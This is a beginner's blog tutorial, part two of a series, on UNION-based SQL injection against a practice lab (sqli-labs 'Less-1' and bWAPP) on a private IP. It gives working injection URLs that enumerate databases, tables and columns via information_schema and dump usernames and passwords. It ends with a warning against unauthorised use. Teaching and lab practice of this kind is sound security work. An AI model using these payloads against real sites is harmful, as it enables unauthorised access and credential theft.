Beginner's Guide to SQL Injection (Basics Part 2)

Hello guys, I am back with second part of my article Beginner’s Guide to SQL Injection.

Hope you guys have enjoyed first part and understood the basics of SQL Injection. If you have not read it yet then it will be little difficult for you to understand this article. I request you to read Part-1 first from this  link before reading this.

While concluding Part-1 I asked you guys to read about “information_schema”, “table_schema” and “LIMIT clause”

If you have read it then it’s very good, for those of you who were unable to read I’ll explain here again in short.

INFORMATION_SCHEMA

In simple words, you can think of information_schema as a "MASTER DATABASE" that holds details about all the other databases on the server such as the names and types of tables, columns and users.

Information_schema will have many tables (see screenshot)

But we’ll be using only these (see screenshot below) tables of information_schema maximum number of times to dump database. You can use other tables also, if you want to extract other information. So which table to use will totally depend on the QUERY you are forming.

  

To access tables of information_schema we’ll use .(dot) operator.

Example

To access COLUMNS	information_schema.COLUMNS
To access TABLES	information_schema.TABLES
To access SCHEMATA	information_schema.SCHEMATA

  

In first part we were able to get the database name and version of the database using the select query

“SELECT 1,database(),version() ” see screenshot

Now we’ll dump real database.

We know that database we are in is “SECURITY”

AIM-1    --   To find out all the DATABASES on the server. (Very critical)

Information about all the databases will be present in the SCHEMATA table of the information_schema.

Let’s first see the terminal output

From the screenshot we know we are concerned about column “SCHEMA_NAME”

So query will be

SELECT schema_name from Information_schema.SCHEMATA;

Question – Here we have access to the backend database so we figured out that column name is “SCHEMA_NAME” that contains name of the databases. But in real time scenario how we’ll figure this out?

Answer – See this depends on the type and version of the Database. So for MySQL database it will remain same.

Let’s try to extract same information using SQL Injection

In article 1 we figured out that we were getting result of column 2 and column 3 on UI so we’ll create our query in the way that it will be syntactically correct to work with UNION operator and we’ll get our desired output on UI as well.

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata --+

See screenshot below 

Question – Using above query we get only one (first in the list) schema name. How to get other schema name also?

Answer – Well to get all schema name there are two ways

a    Using LIMIT clause

b   Using group_concat() function

I’ll show you how to use both here but in future I’ll use group_concat() function mainly because it saves time and you get all values at the same time.

a)     Using LIMIT clause

Finding 2^nd Schema_name using LIMIT clause

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata LIMIT 1,1--+

  

Finding 3^rd Schema_name using LIMIT clause

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata LIMIT 2,1--+

Similarly keep on increasing the value in LIMIT clause to get schema names.

b)    Using group_concat() function

Using group_concat() function we’ll get all schema_name at the same time no need to iterate the value as we did using LIMIT clause

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(schema_name),3 from information_schema.schemata --+

See screenshot below

  

AIM-2     --   To find out all the TABLES in the DATABASE

a)      To find out all the tables of the DATABASE “SECURITY”

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

So there are 4 tables in the database “SECURITY”

Table 1 – emails

Table 2 – referers

Table 3 – uagents

Table 4 – users

(Table 4 “USERS” look interesting May be we get important information in this table)

b) To find out all the tables of the DATABASE “bWAPP”

(Note- See you may not have bWAPP database on your server so you can use other database that will be present on your server. Sometimes you will not be able to extract information from database other than the database associated with the application on which you are exploiting SQL injection)

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema='bWAPP'--+

From now on I’ll deal with only “SECURITY” database.

AIM-3     --    To find out all the COLUMNS of all the tables in the DATABASE “SECURITY”

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_schema='security' --+

(See if you will not use where clause to specify table_schema=’security’. The command will give you all the columns that are there in the information_schema.columns, means you will get all the columns of all the tables of all databases present on the server) à TRY THIS BY YOURSELF

  

AIM-4    --    To find out all the COLUMNS of a particular table (here users) of the DATABASE “SECURITY”

It’s simple you only need to add one more condition in where clause to specify table_name with AND operator

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

  

Now we know the USERS table of DATABASE “SECURITY” has 3 columns

Column 1 – id

Column 2 – username

Column 3 – password

(Table with table name “USERS” can be present in more than one database, so if you will not specify table_schema =’security’ in the above command, you will get column name of all the tables with table name “USERS” from different databases)

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name='users'--+

  

Now see below screenshot to understand why above command gives so many columns names.

This screenshot shows my database has table with table name “USERS” in 4 databases, so above command displays columns name of all these 4 tables with table name “USERS” from different databases

  

AIM-5    --   To find out all the values of columns “username” and “password” of the table having table name “USERS”

Now we know the name of the tables and columns so there’ll be no need to take the help of information_schema

(We are already in “SECURITY” database because application (DHAKKAN LAB) is interacting with database “SECURITY”)

Here we’ll use simple command

SELECT username, password from users;

To get all username and password we’ll use group_concat() function

SELECT group_concat(username), group_concat(password) from users;

                                                OR

SELECT group_concat(username), group_concat(password) from security.users;

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(username), group_concat(password) from users--+

                                                            OR

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(username), group_concat(password) from security.users--+

Similarly you can extract values of columns from “USERS” table of other database also by simply adding database name just before table name users like this à bWAPP.users

But first you have to find out the column names present in the table “USERS” of other database.

http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(login), group_concat(password) from bWAPP.users--+

NOTE – PLEASE DON’T TRY THIS ON ANY LIVE SITE FOR WHICH YOU DON’T HAVE PERMISSION. LOGS ARE GENERATED AND ARE MONITORED YOU MAY CREATE A TROUBLE FOR YOUSELF. (I have seen guys who literally ruined their own career and are now busy in solving legal actions taken against them)

Use this knowledge to help organizations in securing their websites from bad guys.

You can legally earn a lot in information security career by using your knowledge in securing the cyber world  

Author – Rinkish Khera

Rinkish Khera is a Web Application security consultant who loves competitive coding, hacking and learning new things about technology. 

You can contact me here